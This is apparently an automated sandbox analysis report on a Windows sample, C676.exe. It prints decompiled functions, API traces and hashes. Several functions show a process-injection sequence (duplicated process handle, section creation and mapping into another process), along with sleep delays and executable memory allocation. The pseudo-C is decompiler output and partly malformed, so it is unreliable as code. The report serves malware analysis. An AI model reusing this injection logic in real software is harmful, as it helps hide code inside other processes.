NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040159A Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040159A() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t209;

				_push(0x83);
				L004011F5(_t175, _t209);
				_t127 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L61;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t204;
				_push(0x83);
				L004011F5(_t176, _t230);
				return _t90;
			}

0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 007B005C Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007B0084
Module32First.KERNEL32(00000000,00000224), ref: 007B00A4

Memory Dump Source

Source File: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a9000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 99b98642f3d0d5da2870794e4f2c7f6d741bf7f8a1eeb1ace8038a3eb3401c81
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 21F09635600711ABD7303BF9A88DBAF76E8AF49765F100628F646910C0DB78EC4546A1

Uniqueness

Uniqueness Score: -1.00%

Function 00401749 Relevance: 3.0, APIs: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00409001 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00409045

Memory Dump Source

Source File: 00000000.00000002.396915167.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c4a8ff367d56516dd0cd0c8c48acb0f2d6387128a927d9d1c43a96c89406084
Instruction ID: 95272b159981a501e6453c50e91d12690812abe81ed53b0fa942f6aa3e95e1b6
Opcode Fuzzy Hash: 0c4a8ff367d56516dd0cd0c8c48acb0f2d6387128a927d9d1c43a96c89406084
Instruction Fuzzy Hash: CA01F771A0552296DA316B259C80A6F7308DB613A4B100037ED01FE3E2CB39CC43929D

Uniqueness

Uniqueness Score: -1.00%

Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				void* _t19;
				void* _t20;

				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, __eflags);
				_t14 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				_t10 = L00401467(_t19, _t20); // executed
				_t26 = _t10;
				if(_t10 != 0) {
					E00401558(_t14, _t10, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				_t12 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t26);
				return _t12;
			}

0x00401943
0x0040195b
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F

Uniqueness

Uniqueness Score: -1.00%

Function 0040193D Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t14;
				void* _t16;
				intOrPtr* _t18;
				void* _t30;
				signed int _t38;

				_t26 = __edi;
				asm("in eax, 0x45");
				_t2 = __eax - 0x7a;
				 *_t2 =  *(__eax - 0x7a) | __ecx;
				_t38 =  *_t2;
				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(__edi, _t38);
				_t18 =  *((intOrPtr*)(_t30 + 8));
				Sleep(0x1388);
				_push(_t30 - 4);
				_push( *((intOrPtr*)(_t30 + 0x10)));
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t18); // executed
				_t14 = L00401467(__edi, __esi); // executed
				_t39 = _t14;
				if(_t14 != 0) {
					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_t16 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t26, _t39);
				return _t16;
			}

0x0040193d
0x00401940
0x00401942
0x00401942
0x00401942
0x00401943
0x0040195b
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 0040196C Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				void* _t11;
				intOrPtr* _t13;
				void* _t23;

				_t19 = __edi;
				_pop(es);
				asm("sbb bh, [eax+ebp*2]");
				_push(0xc5);
				L004011F5(__edi, __eflags);
				_t13 =  *((intOrPtr*)(_t23 + 8));
				Sleep(0x1388);
				_push(_t23 - 4);
				_push( *((intOrPtr*)(_t23 + 0x10)));
				_push( *((intOrPtr*)(_t23 + 0xc)));
				_push(_t13); // executed
				_t9 = L00401467(__edi, __esi); // executed
				_t29 = _t9;
				if(_t9 != 0) {
					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
				}
				 *_t13(0xffffffff, 0);
				_t11 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t29);
				return _t11;
			}

0x0040196c
0x0040196c
0x0040196d
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 007AFD1B Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007AFD6C

Memory Dump Source

Source File: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a9000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 5456afcaafa5935be6dca2a6fdf72fe952ae08989eb5ea1e7f141c6a733a6b9f
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 42113C79A01208EFDB01DF98C985E99BBF5AF08350F0580A4F9489B362D375EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 007AF939 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a9000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 3d9ae1e2625b6b35c70ae02d9ab157749b03f9d97c5d078fb21c6bdb9f73c4fc
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 54115E72340100AFDB54DF95DC81FA773EAEB9A360B298165ED08CB316D679EC42C760

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1A5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040A1CB

Part of subcall function 00409FF0: __fltout2.LIBCMT ref: 0040A01C

__cftog_l.LIBCMT ref: 0040A1F1
__cftoe_l.LIBCMT ref: 0040A223

Memory Dump Source

Source File: 00000000.00000002.396915167.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bd12eb7fbf19b7960c4a92c1d962089a67ab9531ad6616119e9025b97fb1b0a2
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 0E11753204014EBBCF125E85DC058EE3F62BF59354F18856AFE1868171D63BC9B1AB86

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: C676.exePID: 4620, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	14.3%
Signature Coverage:	5.6%
Total number of Nodes:	1086
Total number of Limit Nodes:	13

Executed Functions

Function 00411470 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 610
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00411470(signed int __ebx, signed int __edx, signed int _a4, signed int _a8) {
				intOrPtr _v0;
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v36;
				char _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				intOrPtr* _v72;
				char _v4116;
				void* _v4120;
				void* _v4124;
				char _v4140;
				void* _v4164;
				void* _v4168;
				void* _v4172;
				void* _v4204;
				char _v4212;
				intOrPtr _v4216;
				intOrPtr _v4236;
				intOrPtr _v4260;
				char _v4312;
				char _v4316;
				void* _v4340;
				void* _v4344;
				void* _v4348;
				void* _v4380;
				char _v4388;
				intOrPtr _v4392;
				intOrPtr _v4408;
				intOrPtr _v4432;
				char _v4484;
				intOrPtr _v4488;
				intOrPtr _v4492;
				char _v4500;
				char _v4504;
				signed char _v4505;
				signed char _v4506;
				signed char _v4507;
				signed char _v4508;
				signed char _v4509;
				signed char _v4510;
				char _v4511;
				signed int _v4512;
				char _v4514;
				char _v4515;
				short _v4516;
				intOrPtr _v4520;
				intOrPtr _v4524;
				char _v4527;
				char _v4528;
				signed int _v4529;
				char* _v4536;
				void* _v4540;
				void* _v4544;
				char _v4560;
				char _v4562;
				short _v4564;
				intOrPtr _v4568;
				intOrPtr _v4572;
				char _v4603;
				signed int _v4604;
				void* _v4608;
				void* _v4612;
				char _v4628;
				intOrPtr _v4632;
				char _v4652;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t342;
				signed int _t343;
				void* _t367;
				void* _t375;
				char* _t386;
				signed int _t387;
				signed int _t395;
				signed int _t402;
				void* _t408;
				signed int _t409;
				signed int _t410;
				signed int _t416;
				void* _t426;
				signed int _t428;
				signed char _t438;
				signed char _t439;
				char* _t443;
				void* _t444;
				char* _t447;
				void* _t477;
				intOrPtr _t479;
				intOrPtr _t483;
				intOrPtr _t487;
				intOrPtr _t491;
				void* _t512;
				void* _t518;
				intOrPtr* _t524;
				void* _t526;
				void* _t532;
				intOrPtr* _t538;
				signed int _t540;
				void* _t549;
				char* _t551;
				void* _t556;
				intOrPtr* _t557;
				intOrPtr* _t558;
				signed int _t559;
				intOrPtr _t560;
				void* _t562;
				signed int _t563;
				signed char _t573;
				signed int _t576;
				void* _t578;
				void* _t579;
				intOrPtr _t580;
				signed int _t581;
				void* _t585;
				void* _t596;
				void* _t597;
				void* _t598;
				void* _t599;
				signed char _t607;
				signed char _t609;
				signed char _t613;
				signed char _t615;
				signed int _t618;
				signed char _t621;
				void* _t622;
				signed int _t624;
				signed char _t629;
				void* _t632;
				signed char _t633;
				void* _t641;
				char* _t642;
				signed char _t643;
				signed int _t644;
				void* _t647;
				void* _t648;
				void* _t649;
				char* _t650;
				intOrPtr* _t651;
				void* _t654;
				signed int _t655;
				void* _t657;
				void* _t659;
				void* _t660;
				signed int _t661;

				_t618 = __edx;
				_t540 = __ebx;
				_push(0xffffffff);
				_push(0x43263c);
				_push( *[fs:0x0]);
				E00414250(0x121c);
				_t342 =  *0x443048; // 0x35200185
				_t343 = _t342 ^ _t655;
				_v20 = _t343;
				_push(_t648);
				_push(_t641);
				_push(_t343);
				 *[fs:0x0] =  &_v16;
				_v4536 = 0;
				_t346 =  >=  ?  *0x443aec : 0x443aec;
				CreateDirectoryA( >=  ?  *0x443aec : 0x443aec, 0); // executed
				E00415180(_t641,  &_v4500, 0, 0xb8);
				_v4500 = 0x43ea7c;
				_v4380 = 0;
				_v4348 = 0;
				_v4344 = 0;
				_v4340 = 0;
				_v8 = 0;
				_v4536 = 8;
				asm("xorps xmm0, xmm0");
				_v4388 = 0x43ea88;
				_v4392 = 0x58;
				asm("movlpd [ebp-0x1188], xmm0");
				E00407F70( &_v4388, _t618,  *0x443b00 - 0x10,  &_v4484);
				_v8 = 2;
				 *((intOrPtr*)(_t655 +  *((intOrPtr*)(_v4500 + 4)) - 0x1190)) = 0x43ea90;
				_t22 = _v4500 + 4; // 0x43f75c
				_t23 =  *_t22 - 0x70; // 0x43f6ec
				 *((intOrPtr*)(_t655 +  *_t22 - 0x1194)) = _t23;
				E00407040( &_v4484,  *0x443b00 - 0x10);
				_v8 = 3;
				E00415180(_t641,  &_v4316, 0, 0xb0);
				_v4316 = 0x43ea74;
				_v4204 = 0;
				_v4172 = 0;
				_v4168 = 0;
				_v4164 = 0;
				_t659 = _t657 + 0x10;
				_v8 = 4;
				_v4536 = 0x28;
				_v4212 = 0x43ea98;
				_v4216 = 0x60;
				E00407F70( &_v4212, _t618,  *0x443b00 - 0x10,  &_v4312);
				_v8 = 6;
				 *((intOrPtr*)(_t655 +  *((intOrPtr*)(_v4316 + 4)) - 0x10d8)) = 0x43ea70;
				_t45 =  &_v4316; // 0x43ea70
				_t47 =  *((intOrPtr*)( *_t45 + 4)) - 0x68; // -104
				 *((intOrPtr*)(_t655 +  *((intOrPtr*)( *_t45 + 4)) - 0x10dc)) = _t47;
				E00407040( &_v4312,  *0x443b00 - 0x10);
				_v8 = 7;
				_t367 =  >=  ?  *0x443abc : 0x443abc;
				if(_v4408 != 0) {
					L6:
					_t549 =  &_v4500 +  *((intOrPtr*)(_v4500 + 4));
					__eflags =  *(_t549 + 0x38);
					_t372 = 0x00000002 + ( *(_t549 + 0x38) == 0x00000000) * 0x00000004 |  *(_t549 + 0xc);
					__eflags = 0x00000002 + ( *(_t549 + 0x38) == 0x00000000) * 0x00000004 |  *(_t549 + 0xc);
				} else {
					_push(0x40);
					_push(0x21);
					_t526 = E00412A0C(_t618, _t367); // executed
					_t659 = _t659 + 0xc;
					if(_t526 == 0) {
						goto L6;
					} else {
						E00406E40( &_v4484, _t526, 1);
						_t613 =  *(_v4432 + 4);
						_v4508 = _t613;
						 *((intOrPtr*)( *_t613 + 4))();
						_v8 = 8;
						_t532 = E00408400(__ebx, _t618, _t641, _t648,  &_v4512);
						_t659 = _t659 + 4;
						E00406CE0( &_v4484, _t532);
						_v8 = 7;
						_t615 = _v4508;
						if(_t615 != 0) {
							_t538 =  *((intOrPtr*)( *((intOrPtr*)( *_t615 + 8))))();
							if(_t538 != 0) {
								 *((intOrPtr*)( *_t538))(1);
							}
						}
						_t618 = 0;
						_t549 =  &_v4500 +  *((intOrPtr*)(_v4500 + 4));
						_t372 =  !=  ? 0 : 4;
					}
				}
				E00403A00(_t540, _t549, _t372, 0);
				_t375 =  >=  ?  *0x443ad4 : 0x443ad4;
				if(_v4236 != 0) {
					L13:
					_t93 =  &_v4316; // 0x43ea70
					_t94 =  &_v4316; // 0x43ea70
					_t551 = _t94 +  *((intOrPtr*)( *_t93 + 4));
					__eflags =  *(_t551 + 0x38);
					_t380 = 0x00000002 + ( *(_t551 + 0x38) == 0x00000000) * 0x00000004 |  *(_t551 + 0xc);
					__eflags = 0x00000002 + ( *(_t551 + 0x38) == 0x00000000) * 0x00000004 |  *(_t551 + 0xc);
				} else {
					_push(0x40);
					_push(0x32);
					_t512 = E00412A0C(_t618, _t375); // executed
					_t659 = _t659 + 0xc;
					if(_t512 == 0) {
						goto L13;
					} else {
						E00406E40( &_v4312, _t512, 1);
						_t607 =  *(_v4260 + 4);
						_v4508 = _t607;
						 *((intOrPtr*)( *_t607 + 4))();
						_v8 = 9;
						_t518 = E00408400(_t540, _t618, _t641, _t648,  &_v4512);
						_t659 = _t659 + 4;
						E00406CE0( &_v4312, _t518);
						_v8 = 7;
						_t609 = _v4508;
						if(_t609 != 0) {
							_t524 =  *((intOrPtr*)( *((intOrPtr*)( *_t609 + 8))))();
							if(_t524 != 0) {
								 *((intOrPtr*)( *_t524))(1);
							}
						}
						_t618 = 0;
						_t551 =  &_v4316 +  *((intOrPtr*)(_v4316 + 4));
						_t380 =  !=  ? 0 : 4;
					}
				}
				E00403A00(_t540, _t551, _t380, 0);
				while(( *(_t655 +  *((intOrPtr*)(_v4500 + 4)) - 0x1184) & 0x00000001) == 0) {
					_t659 = _t659 - 8;
					E00412050( &_v4500, _t618,  &_v4116); // executed
					_push(_v4488);
					_push(_v4492);
					_t551 =  &_v4316;
					_push( &_v4116); // executed
					L56(); // executed
				}
				E0041BF04(_t551, E0041BE7B(_t551, _t618, 0));
				_push(0x100000); // executed
				_t386 = E0041BF16(); // executed
				_t660 = _t659 + 0xc;
				_v4536 = _t386;
				_t387 = E0041BEE3(_t551);
